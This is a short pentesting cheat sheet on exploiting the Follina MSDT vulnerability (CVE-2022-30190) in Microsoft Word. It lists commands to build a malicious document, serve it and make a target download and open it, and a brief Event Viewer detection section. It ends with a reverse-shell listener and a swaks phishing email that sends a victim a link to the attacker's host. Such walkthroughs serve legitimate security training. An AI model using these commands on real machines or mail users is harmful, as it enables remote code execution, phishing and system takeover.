Microsoft Word Pentesting

Follina MSDT (CVE-2022-30190)

Microsoft Support Diagnostic Tool (MSDT) is vulnerable with Follina.

1. Download the Payload in Local Machine

   Clone the payload from msdt-follina.

2. Create the Maldoc in Local Machine

   # -i: interface name
   python3 follina.py -i eth0
   Copied!

   Then a new maldoc named “follina.doc” will be created in the current directory. Now you’ve started the web server.

3. Open Another Web Server in Local Machine

   Open another terminal and move to the msdt-follina directory, then start web server to transfer the maldoc to target machine.

   python3 -m http.server 3456
   Copied!

4. Transfer the Maldoc to Target Machine

   In target Windows machine, open powershell and execute the following command.

   cd ~/Desktop
   curl http://<local-ip>:3456/follina.doc -o follina.docx
   Copied!

5. Open the Maldoc

   In target machine, open the maldoc you transfered.

   .\follina.docx
   Copied!

6. Check the Process Explorer of Sysinternals in Target Machine

   Find interesting processes in the Process Explorer.

7. Check the Event Viewer in Target Machine to Detect Suspicious Processes

   1. Go to "View" -> "Use Quick Filter"

   2. A search bar should appear on top of the logs. Choose “Find Event ID” on the right of the search bar, and enter “4688”(it means that “a new process has been created”) in a search bar.

   3. Open the Find (Ctrl+F) and enter “winword”. Then check the contents of results.

   4. Go to Options → Advanced Options

• Reverse Shell via SMTP

  If the target uses SMTP, you may be able to reverse shell using it. Start the exploit to wait for reverse connections.

  sudo python3 follina.py -i tun0 -p 80 -r 4444
  Copied!

  Send e-mail to the target machine via SMTP using swaks.

  swaks --to victim@vulnerable.com --from test@test --server mail.vulnerable.com --body "http://<local-ip>/"